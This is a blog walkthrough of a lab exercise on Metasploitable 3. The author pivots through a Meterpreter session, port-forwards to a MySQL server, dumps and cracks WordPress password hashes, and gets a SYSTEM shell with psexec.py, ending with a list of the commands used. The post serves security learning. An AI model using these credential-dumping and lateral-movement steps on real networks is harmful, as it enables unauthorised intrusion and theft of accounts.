Premise

In this walkthrough, we demonstrated the concept of network pivoting. We compromised the main windows target and discovered another windows server to which we also gained access by exploiting the MySQL server.

Skills Learned

  • Windows Penetration Testing
  • MySQL Server enumeration and exploitation
  • Network Pivoting
  • Metasploit

Finding a Hidden Network

I started with a privileged Meterpreter session on the first Metasploitable 3 machine. The first thing I did was run ifconfig to check out the network interfaces. I found two: one was the standard VirtualBox adapter, but the other was on a completely different network, 192.168.56.x. This was my first clue that there was more to this network than meets the eye.

Since I couldn’t directly reach this new network, I had to create a “pivot” or a tunnel through my compromised machine. I used a Metasploit module called autoroute to add a route to the new network. This essentially told Metasploit to send any traffic for that network through my existing Meterpreter session.

Exploring the New Territory

With my route in place, I started scanning the new network for open ports. I used db_nmap from within Metasploit and found that port 3306 (MySQL) was open on one of the hosts. This was a great find because databases often contain valuable information, like user credentials.

To connect to the MySQL server, I used another cool technique called port forwarding. I set up a rule in my Meterpreter session to forward all traffic from a local port on my machine to the MySQL port on the remote machine. This allowed me to connect to the remote database as if it were running on my own computer.

Cracking the Database

Once I was connected to the MySQL server, I found a WordPress database. I dumped the wp_users table and found usernames and password hashes for a couple of users, including ‘admin’ and ‘vagrant’. I cracked the hashes using John the Ripper and got the passwords: ‘exploit’ and ‘vagrant’.

I tried to use these credentials to log into the WordPress site, but I had some trouble accessing the login page. It seemed to be running on a non-standard port that I couldn’t immediately find. So, I decided to switch gears and try a different approach.

The Final Takeover

Since I had valid credentials for the ‘vagrant’ user, I decided to try and get a shell on the second machine directly. I used a tool called psexec.py to connect to the machine using the ‘vagrant’ username and password. To make this work, I had to set up another port forward, this time for the SMB service on port 445.

The psexec.py tool worked like a charm, and I was greeted with a command prompt on the second machine. I ran whoami, and to my delight, I had nt authority\system privileges! I had successfully pivoted from one machine to another and gained full control of the second host. 🤘

Technical Commands I Used

Here are some of the key commands that I used throughout this process:

  • ifconfig: To check the network interfaces on the compromised machine.
  • use post/multi/manage/autoroute: The Metasploit module for creating a route to a new network.
  • db_nmap -p 3306 -sV 192.168.56.1/24: To scan for the MySQL port on the new network.
  • portfwd add -l 3306 -p 3306 -r 192.168.56.1: To forward the remote MySQL port to my local machine.
  • mysql -u root -h 127.0.0.1: To connect to the forwarded MySQL port.
  • SELECT user_login, user_pass FROM wp_users;: The SQL query to dump the WordPress user credentials.
  • sudo john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt: To crack the password hashes.
  • portfwd add -l 1122 -p 445 -r 192.168.56.1: To forward the SMB port for psexec.py.
  • python psexec.py vagrant@127.0.0.1: To get a shell on the second machine.
  • whoami: To confirm my system-level privileges.

Video WalkThrough

About the Author

Mastermind Study Notes is a group of talented authors and writers who are experienced and well-versed across different fields. The group is led by, Motasem Hamdan, who is a Cybersecurity content creator and YouTuber.

View Articles